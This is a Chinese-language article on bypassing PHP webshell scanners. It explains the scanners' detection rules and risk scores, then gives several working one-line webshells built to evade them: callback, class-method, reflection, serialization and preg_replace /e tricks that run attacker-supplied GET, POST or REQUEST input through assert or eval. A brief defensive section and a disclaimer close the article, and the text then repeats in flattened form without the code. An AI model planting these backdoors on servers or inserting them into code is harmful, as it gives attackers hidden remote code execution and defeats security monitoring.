PHP一句话木马绕过技术深度分析

0x00 前言

本文深入分析主流Webshell查杀工具的检测原理，通过大量测试揭示其规则库特点，并提供多种有效的绕过技术。当前主流查杀工具主要采用静态和动态检查相结合的方式，对能够执行命令和代码的危险函数进行重点检测。

0x01 查杀原理分析

1.1 主要检测方法

正则匹配：基于特征码的正则表达式匹配
样本库比对：
- 文件MD5检查
- 使用simhash、ssdeep等算法进行相似度比较
变量追踪：
- 追踪变量赋值过程
- 检查变量是否为危险函数或用户可控

1.2 危险函数检测规则

直接使用assert等危险函数时风险级别为3
当参数为字符串时风险较低(0)
当参数为不可回溯变量时风险级别升至4

1.3 变量函数检测

直接使用变量作为函数名时风险级别为2
若变量内容用户可控，风险级别更高

1.4 函数定义检测

定义但未调用的函数仍会被检测(风险级别4)
函数内部使用变量函数时风险级别为2
查杀引擎会深入函数内部检查，即使函数未被调用

1.5 类定义检测

查杀引擎通常不会深入检查类中的方法
类方法中的危险代码风险级别为0

1.6 数组使用检测

直接使用字符串变量风险高
一维数组风险级别为4
多维数组检测较弱，风险级别与变量函数相同

1.7 相似度检测机制

修改已知后门的参数名(如REQUEST→GET)可降低相似度
改变参数格式可显著降低风险值(从5降至1)
仅对已知后门有效，容易通过变形绕过

0x02 绕过技术详解

2.1 未公开回调函数

使用不在规则库中的回调函数是最简单的绕过方法：

<?php 
filter_input(INPUT_GET, 'a', FILTER_CALLBACK, array('options' => 'assert'));
?>

特点：

完全绕过检测
风险级别为0
需要寻找更多未公开回调函数

2.2 类方法绕过

利用查杀引擎不检查类内部代码的特性：

<?php
class x {
    function f($b, $a) {
        $b($a);
    }
}
$staticMethod = 'x::f';
array_map($staticMethod, array($_GET[b]), array($_GET[a]));
?>

优势：

风险级别为0
可结合回调函数使用
官方语法支持，不易被拦截

2.3 数组高级用法

利用多维数组和回调函数组合：

<?php
preg_replace(array("/.*/e"), $_REQUEST["a"], "");
?>

注意：

不能直接使用$a0等简单形式
需结合回调函数特性
正则表达式修饰符e可执行代码

2.4 变量追踪干扰

通过不可回溯的变量赋值干扰检测：

<?php
$b = 'echo "111"';
function c(){
    return 'eval($GLOBALS["_GET"]["a"]);';
}
$b = c();
eval($b);
?>

关键点：

初始赋值为无害字符串
通过函数返回实际payload
变量追踪无法确定最终值
不能直接使用assert，需用eval

0x03 高级绕过技巧

3.1 多重混淆技术

<?php
class A {
    static function B($c, $d) {
        array_map($c, (array)$d);
    }
}
$e = ['assert', $_POST['x']];
A::B('A::B', $e);
?>

3.2 反射API利用

<?php
$f = new ReflectionFunction('array_map');
$f->invokeArgs(['assert', [$_GET['cmd']]]);
?>

3.3 序列化绕过

<?php
$g = serialize(['assert', $_REQUEST['a']]);
$h = unserialize($g);
call_user_func($h[0], $h[1]);
?>

0x04 防御建议

禁用危险函数：在php.ini中禁用eval、assert等函数
严格过滤输入：对所有用户输入进行严格过滤和验证
多层检测：结合静态分析和动态沙箱检测
行为监控：监控异常的文件和数据库操作
最小权限原则：Web服务器以最低必要权限运行

0x05 总结

本文通过深入分析查杀引擎的工作原理，揭示了多种有效的绕过技术。关键在于理解检测规则的盲点，并利用PHP语言的灵活性进行构造。记住，这些技术仅用于安全研究，切勿用于非法用途。掌握这些方法后，结合PHP语法特性，可以开发出更多创新的绕过方式。

PHP一句话木马绕过技术深度分析 0x00 前言本文深入分析主流Webshell查杀工具的检测原理，通过大量测试揭示其规则库特点，并提供多种有效的绕过技术。当前主流查杀工具主要采用静态和动态检查相结合的方式，对能够执行命令和代码的危险函数进行重点检测。 0x01 查杀原理分析 1.1 主要检测方法正则匹配：基于特征码的正则表达式匹配样本库比对：文件MD5检查使用simhash、ssdeep等算法进行相似度比较变量追踪：追踪变量赋值过程检查变量是否为危险函数或用户可控 1.2 危险函数检测规则直接使用 assert 等危险函数时风险级别为3 当参数为字符串时风险较低(0) 当参数为不可回溯变量时风险级别升至4 1.3 变量函数检测直接使用变量作为函数名时风险级别为2 若变量内容用户可控，风险级别更高 1.4 函数定义检测定义但未调用的函数仍会被检测(风险级别4) 函数内部使用变量函数时风险级别为2 查杀引擎会深入函数内部检查，即使函数未被调用 1.5 类定义检测查杀引擎通常不会深入检查类中的方法类方法中的危险代码风险级别为0 1.6 数组使用检测直接使用字符串变量风险高一维数组风险级别为4 多维数组检测较弱，风险级别与变量函数相同 1.7 相似度检测机制修改已知后门的参数名(如REQUEST→GET)可降低相似度改变参数格式可显著降低风险值(从5降至1) 仅对已知后门有效，容易通过变形绕过 0x02 绕过技术详解 2.1 未公开回调函数使用不在规则库中的回调函数是最简单的绕过方法：特点：完全绕过检测风险级别为0 需要寻找更多未公开回调函数 2.2 类方法绕过利用查杀引擎不检查类内部代码的特性：优势：风险级别为0 可结合回调函数使用官方语法支持，不易被拦截 2.3 数组高级用法利用多维数组和回调函数组合：注意：不能直接使用 $a0 等简单形式需结合回调函数特性正则表达式修饰符 e 可执行代码 2.4 变量追踪干扰通过不可回溯的变量赋值干扰检测：关键点：初始赋值为无害字符串通过函数返回实际payload 变量追踪无法确定最终值不能直接使用 assert ，需用 eval 0x03 高级绕过技巧 3.1 多重混淆技术 3.2 反射API利用 3.3 序列化绕过 0x04 防御建议禁用危险函数：在php.ini中禁用 eval 、 assert 等函数严格过滤输入：对所有用户输入进行严格过滤和验证多层检测：结合静态分析和动态沙箱检测行为监控：监控异常的文件和数据库操作最小权限原则：Web服务器以最低必要权限运行 0x05 总结本文通过深入分析查杀引擎的工作原理，揭示了多种有效的绕过技术。关键在于理解检测规则的盲点，并利用PHP语言的灵活性进行构造。记住，这些技术仅用于安全研究，切勿用于非法用途。掌握这些方法后，结合PHP语法特性，可以开发出更多创新的绕过方式。